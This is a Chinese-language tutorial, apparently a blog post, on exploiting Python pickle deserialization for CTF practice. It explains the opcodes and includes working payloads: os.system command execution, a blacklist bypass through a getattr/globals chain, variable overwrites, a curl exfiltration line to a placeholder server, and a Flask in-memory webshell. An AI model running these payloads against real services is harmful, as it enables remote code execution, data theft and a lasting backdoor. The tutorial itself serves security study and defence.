什么是Pickle?

模块pickle实现了对一个 Python 对象结构的二进制序列化和反序列化。 “pickling” 是将 Python 对象及其所拥有的层次结构转化为一个字节流的过程,而 “unpickling” 是相反的操作,会将(来自一个 binary file 或者 bytes-like object 的)字节流转化回一个对象层次结构。 pickling(和 unpickling)也被称为“序列化”, “编组” 或者 “平面化”。而为了避免混乱,此处采用术语 “封存 (pickling)” 和 “解封 (unpickling)”。

提到pickle,那就离不开opcode,在Pickle的上下文中,opcode(操作码)是Pickle字节码的基本指令。Pickle的序列化数据实际上是由一系列opcode组成的程序,这些opcode告诉Pickle解释器如何重建原始对象。每个opcode是一个字节(或更长),对应一个特定的操作

1
2
3
4
BININT1:将一个1字节的整数压入栈
GLOBAL:导入一个全局对象(如函数或类)
REDUCE:调用可调用对象并组合参数
STOP:结束Pickle程序

pickle解析能力大于pickle生成能力

生成能力:通过pickle.dump()pickle.dumps()生成的序列化数据是Python对象的标准表示形式。Pickle会尝试用最通用的opcode序列来表示对象

解析能力:Pickle解释器(pickle.load()pickle.loads())可以执行更复杂的opcode序列,包括一些无法通过标准序列化生成的指令。这意味着我们可以手动编写opcode序列来实现一些标准序列化无法完成的操作,Pickle解释器实际上是一个小型的虚拟机,能够执行这些指令

Pickle的标准序列化可能无法生成某些opcode组合(例如直接修改变量或执行任意代码的指令),但手动编写可以构造这些指令

既然opcode能够执行Python代码,那自然就免不了安全问题

image-20250407170217487

pickle模块常见方法及接口

pickle.dump

1
2
3
def _dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None):
_Pickler(file, protocol, fix_imports=fix_imports,
buffer_callback=buffer_callback).dump(obj)

将 Python 对象序列化并写入一个文件对象中,不返回序列化后的数据

pickle.dumps

1
2
3
4
5
6
7
def _dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None):
f = io.BytesIO()
_Pickler(f, protocol, fix_imports=fix_imports,
buffer_callback=buffer_callback).dump(obj)
res = f.getvalue()
assert isinstance(res, bytes_types)
return res

将 Python 对象序列化为字节串(bytes),不需要文件对象,在内存中操作,返回序列化后的字节串

pickle.load

1
2
3
4
def _load(file, *, fix_imports=True, encoding="ASCII", errors="strict",
buffers=None):
return _Unpickler(file, fix_imports=fix_imports, buffers=buffers,
encoding=encoding, errors=errors).load()

从文件对象中读取并反序列化为 Python 对象

pickle.loads

1
2
3
4
5
6
7
def _loads(s, /, *, fix_imports=True, encoding="ASCII", errors="strict",
buffers=None):
if isinstance(s, str):
raise TypeError("Can't load pickle from unicode string")
file = io.BytesIO(s)
return _Unpickler(file, fix_imports=fix_imports, buffers=buffers,
encoding=encoding, errors=errors).load()

从字节串反序列化为 Python 对象,输入必须是字节串(bytes),不能是字符串(str)

object.__reduce__()

object.__reduce__() 是 Python 中的一个魔术方法(也称为“特殊方法”或“双下方法”),主要用于定制对象在 pickle 序列化和反序列化时的行为。它允许开发者控制对象如何被序列化为字节流(pickle.dump/pickle.dumps)以及如何从字节流中恢复(pickle.load/pickle.loads)。

它的返回值通常是一个元组,格式为:

1
(callable, args_tuple, [state_dict, [iterable, ...]])

每当该类的对象被反序列化时,该callable就会被调用,参数为para1、para2...

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import pickle
import os

class Person():
def __init__(self):
self.age = 18
self.name = "Pickle"
def __reduce__(self):
command = r"whoami"
return (os.system,(command,))

p = Person()
opcode = pickle.dumps(p)
print(opcode)
P = pickle.loads(opcode)

当上述的Person对象被unpickling时,就会执行os.system(command)

pickle原理

我们前面提到opcode用来告诉Pickle解释器如何重建原始对象,而解析opcode就需要PVM(Pickle Virtual Machine),一个 栈式虚拟机,由以下部分组成:

运行时栈(Stack)PUSH 操作将数据压入栈顶,POP 操作从栈顶取出数据,REDUCE 操作会从栈顶弹出参数和可调用对象,并执行调用

内存(Memo):用于存储 已反序列化的对象引用,避免重复解析

指令集(Opcode):从流中读取 opcode 和参数,并对其进行解释处理。重复这个动作,直到遇到 . 这个结束符后停止

协议版本(Protocol):Pickle 支持多个序列化协议(protocol=0protocol=5),不同版本的协议会影响 opcode 的编码方式

协议版本 Python 版本支持 编码方式 特点
0 所有 Python 版本 ASCII(可读) 最古老,兼容性最好,但效率最低
1 所有 Python 版本 二进制 0 更高效,但仍较旧
2 Python 2.3+ 二进制 支持 __reduce__newobj 优化
3 Python 3.0+ 二进制 默认协议(Python 3.0~3.7),不支持 Python 2
4 Python 3.4+ 二进制 支持大对象(>4GB)、内存优化
5 Python 3.8+ 二进制 默认协议(Python 3.8+),支持 out-of-band 数据

兼容性规则所有 Python 3.x 版本 都可以读取 protocol=0protocol=4 的数据;Python 3.8+ 可以读取 protocol=5 的数据

可以看到pickle协议是向前兼容的,因此我们可以用人类可读的v0版本协议opcode来进行恶意代码的构造

指令 描述 具体写法 栈上的变化
c 获取一个全局对象或import一个模块 c[module]\n[instance]\n 获得的对象入栈
o 寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象) o 这个过程中涉及到的数据都出栈,函数的返回值(或生成的对象)入栈
i 相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象) i[module]\n[callable]\n 这个过程中涉及到的数据都出栈,函数返回值(或生成的对象)入栈
N 实例化一个None N 获得的对象入栈
S 实例化一个字符串对象 S’xxx’\n(也可以使用双引号、\’等python字符串形式) 获得的对象入栈
V 实例化一个UNICODE字符串对象 Vxxx\n 获得的对象入栈
I 实例化一个int对象 Ixxx\n 获得的对象入栈
F 实例化一个float对象 Fx.x\n 获得的对象入栈
R 选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数 R 函数和参数出栈,函数的返回值入栈
. 程序结束,栈顶的一个元素作为pickle.loads()的返回值 .
( 向栈中压入一个MARK标记 ( MARK标记入栈
t 寻找栈中的上一个MARK,并组合之间的数据为元组 t MARK标记以及被组合的数据出栈,获得的对象入栈
) 向栈中直接压入一个空元组 ) 空元组入栈
l 寻找栈中的上一个MARK,并组合之间的数据为列表 l MARK标记以及被组合的数据出栈,获得的对象入栈
] 向栈中直接压入一个空列表 ] 空列表入栈
d 寻找栈中的上一个MARK,并组合之间的数据为字典(数据必须有偶数个,即呈key-value对) d MARK标记以及被组合的数据出栈,获得的对象入栈
} 向栈中直接压入一个空字典 } 空字典入栈
p 将栈顶对象储存至memo_n pn\n
g 将memo_n的对象压栈 gn\n 对象被压栈
0 丢弃栈顶对象 0 栈顶对象被丢弃
b 使用栈中的第一个元素(储存多个属性名: 属性值的字典)对第二个元素(对象实例)进行属性设置 b 栈上第一个元素出栈
s 将栈的第一个和第二个对象作为key-value对,添加或更新到栈的第三个对象(必须为列表或字典,列表以数字作为key)中 s 第一、二个元素出栈,第三个元素(列表或字典)添加新值或被更新
u 寻找栈中的上一个MARK,组合之间的数据(数据必须有偶数个,即呈key-value对)并全部添加或更新到该MARK之前的一个元素(必须为字典)中 u MARK标记以及被组合的数据出栈,字典被更新
a 将栈的第一个元素append到第二个元素(列表)中 a 栈顶元素出栈,第二个元素(列表)被更新
e 寻找栈中的上一个MARK,组合之间的数据并extends到该MARK之前的一个元素(必须为列表)中 e MARK标记以及被组合的数据出栈,列表被更新

我们来举个例子

1
2
3
4
5
6
7
8
import pickle

opcode=b'''cos # 加载 os 模块
system # 获取 os.system 函数
(S'whoami' # MARK 操作符,开始构建参数元组;将字符串'whoami'压入栈
tR.''' # 创建元组;REDUCE 操作符,调用函数;STOP 操作符,结束反序列化

pickle.loads(opcode)

pickletools模块可以将opcode转换成方便我们阅读的形式

1
2
3
4
5
6
7
    0: c    GLOBAL     'os system'
11: ( MARK
12: S STRING 'whoami'
22: t TUPLE (MARK at 11)
23: R REDUCE
24: . STOP
highest protocol among opcodes = 0

漏洞利用

R

1
2
3
4
opcode=b'''cos
system
(S'whoami'
tR.'''

i:相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象)

1
2
3
4
opcode=b'''(S'whoami'
ios
system
.'''

o:寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象)

1
2
3
4
opcode=b'''(cos
system
S'whoami'
o.'''

利用已知类的__setstate__方法构造反序列化(b

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import pickle

class Student():
a = 1

payload = b'''c__main__
Student
)\x81}(V__setstate__
cos
system
ubVwhoami
b.'''

pickle.loads(payload)
1
2
3
4
5
6
7
8
9
10
11
12
13
    0: c    GLOBAL     '__main__ Student'
18: ) EMPTY_TUPLE
19: \x81 NEWOBJ # NEWOBJ 操作符,使用空元组创建 Student 实例
20: } EMPTY_DICT
21: ( MARK
22: V UNICODE '__setstate__'
36: c GLOBAL 'os system'
47: u SETITEMS (MARK at 21)
48: b BUILD
49: V UNICODE 'whoami'
57: b BUILD
58: . STOP
highest protocol among opcodes = 2

__setstate__ 是 Python 对象序列化时的一个特殊方法

当对象被 pickle 反序列化时,会调用这个方法来恢复对象的状态,接收一个参数(通常是字典),用于设置对象的属性

1
2
3
4
5
6
7
8
9
10
11
12
13
class Student:
def __init__(self, name, age):
self.name = name
self.age = age

def __getstate__(self):
# 序列化时调用,返回需要保存的状态
return {'name': self.name, 'age': self.age}

def __setstate__(self, state):
# 反序列化时调用,恢复对象状态
self.name = state['name']
self.age = state['age']

通过创建Student类的实例,修改实例的__setstate__方法为os.system,并调用

变量覆盖

例如有一个session或token

1
2
#secret.py
secret = "It's a secret key!"
1
2
3
4
5
6
7
8
9
10
11
12
13
import pickle
import secret

print(secret.secret)

opcode=b'''c__main__
secret
(S'secret'
S'Hacker!'
db.'''

pickle.loads(opcode)
print(secret.secret)

通过d将两个字符串组合成字典{'secret':'Hacker!'}的形式,在pickle中,反序列化后的数据会以键值的形式存储,所以secret模块中的变量是以{'secret':'It's a secret key!'}形式存储的。最后再通过b来更新字典达到覆盖的效果

值得注意的是,这种修改是发生在当前运行进程的内存中,而不是修改了源文件的内容

自动化解析pickle opcode的工具 pker

绕过限制

特定情况下绕过builtins

在pickle模块中,find_class方法是Unpickler类的一个关键安全控制点,用于在反序列化过程中限制或验证可加载的类。这意味着像os.system这样的函数就是在这里调用的

而为了防范反序列化漏洞,我们可以通过重写Unpickler.find_class()来限制全局变量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import builtins
import io
import pickle

safe_builtins = {
'range',
'complex',
'set',
'frozenset',
'slice',
}

class RestrictedUnpickler(pickle.Unpickler):

def find_class(self, module, name):
# Only allow safe classes from builtins.
if module == "builtins" and name in safe_builtins:
return getattr(builtins, name)
# Forbid everything else.
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
(module, name))

def restricted_loads(s):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(s)).load()

opcode=b"cos\nsystem\n(S'echo hello world'\ntR."
restricted_loads(opcode)

可以看到这里重写了find_class方法,限制调用模块只能为builtins,且函数必须在白名单内

来看一个黑名单的例子code-breaking 2018 picklecode

1
2
3
4
5
6
7
8
9
10
class RestrictedUnpickler(pickle.Unpickler):
blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}

def find_class(self, module, name):
# Only allow safe classes from builtins.
if module == "builtins" and name not in self.blacklist:
return getattr(builtins, name)
# Forbid everything else.
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
(module, name))

这里只是单层检查,只会拦截形如builtins.eval 的直接调用,现在我们可以以沙箱逃逸的思路来看待这道题

通过继承关系创造对象进行Python-Jail我们提及到builtins模块,这里的总思路是链式间接调用

我们先来看builtins模块所包含什么

1
print(builtins.globals())

image-20250409003500691

发现仍包含builtins,而builtins中有我们需要的eval函数,现在全局变量是以字典的形式呈现,而为了获取builtins键的value值,我们需要获取get函数

1
builtins.getattr(builtins.dict,'get')

所以总链子就是

1
2
3
4
builtins.getattr(
builtins.getattr(builtins.dict, 'get')(builtins.globals(), 'builtins'),
'eval'
)('__import__("os").system("whoami")')

这里我们用pker工具来编写

1
2
3
4
5
6
getattr = GLOBAL('builtins', 'getattr')
get = getattr(GLOBAL('builtins', 'dict'), 'get')
builtins = get(GLOBAL('builtins', 'globals')(), 'builtins')
eval=getattr(builtins,'eval')
eval("__import__('os').system('whoami')")
return
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import builtins
import io
import pickle

class RestrictedUnpickler(pickle.Unpickler):
blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}

def find_class(self, module, name):
# Only allow safe classes from builtins.
if module == "builtins" and name not in self.blacklist:
return getattr(builtins, name)
# Forbid everything else.
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
(module, name))

def restricted_loads(s):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(s)).load()

opcode=b"cbuiltins\ngetattr\np0\n0g0\n(cbuiltins\ndict\nS'get'\ntRp1\n0g1\n(cbuiltins\nglobals\n(tRS'builtins'\ntRp2\n0g0\n(g2\nS'eval'\ntRp3\n0g3\n(S'__import__(\\'os\\').system(\\'whoami\\')'\ntR."
restricted_loads(opcode)

绕过关键字过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import flask
import pickle
import admin
import random
import base64
from flask import request, session

app = flask.Flask(__name__)
app.secret_key=random.randbytes(12)

class User:
def __init__(self, username,password):
self.username=username
self.token=hash(password)

def get_password(username):
if username=="admin":
return admin.secret
else:
return session.get("password")

@app.route('/balancer', methods=['GET', 'POST'])
def flag():
pickle_data=base64.b64decode(request.cookies.get("userdata"))
if b'R' in pickle_data or b"secret" in pickle_data:
return "You damm hacker!"
userdata=pickle.loads(pickle_data)
if userdata.token!=hash(get_password(userdata.username)):
return "Login First"
if userdata.username=='admin':
return "Welcome admin, here is your next challenge!"
return "You're not admin!"

if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)

这里的鉴权逻辑是检查密钥和用户名,但由于使用的是pickle,我们可以通过变量覆盖来绕过,但是看到对关键词secret进行了过滤,以下是几种绕过方法

Unicode绕过

1
2
3
4
5
6
7
8
9
b'''capp
admin
(Vsecre\u0074
I123
db0(capp
User
S"admin"
I123
o.'''

使用V指令实例化Unicode字符串对象,同时覆盖变量

image-20250409210527418

利用内置函数获取关键字

通过reversed()函数来将列表逆序(dir的结果是列表形式),next()获取迭代对象的下一个元素

1
print(next(reversed(dir(admin))))

得到secret属性

1
2
3
4
5
6
7
8
9
opcode=b'''(((capp
admin
ibuiltins
dir
ibuiltins
reversed
ibuiltins
next
.'''

这里注意理解i指令,三个MARK标记就足够了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
opcode=b'''c__main__
admin
((((c__main__
admin
ibuiltins
dir
ibuiltins
reversed
ibuiltins
next
I123
db0(c__main__
User
S"admin"
I123
o.'''

然后根据上面的payload合并即可

image-20250410014438032

这里由于没有过滤很全,算是一个非预期吧

1
2
3
4
opcode=b'''(S"curl vps:ip/?a=`cat flag`"
ios
system
.'''

image-20250410015735249

如果可以出网的话,我们选择外带数据

利用pickle打内存马

假设有类似如下逻辑代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from flask import Flask, request
import pickle
import base64

app = Flask(__name__)

@app.route('/unpickle', methods=['POST'])
def unpickle():
data = request.form.get('data')
obj = pickle.loads(base64.b64decode(data))
return "Done"

if __name__ == '__main__':
app.run()

可以构造

1
2
3
4
5
6
7
import pickle
import base64
class A():
def __reduce__(self):
return (eval,("__import__('sys').modules['__main__'].__dict__['app'].after_request_funcs.setdefault(None, []).append(lambda resp: Cmdresp if request.args.get('cmd') and exec(\"global Cmdresp;Cmdresp=__import__(\'flask\').make_response(__import__(\'os\').popen(request.args.get(\'cmd\')).read())\")==None else resp)",))

print(base64.b64encode(pickle.dumps(A())))

image-20250410165127798

参考文档:

Pickle反序列化

CTF中Python_Flask应用的一些解题方法总结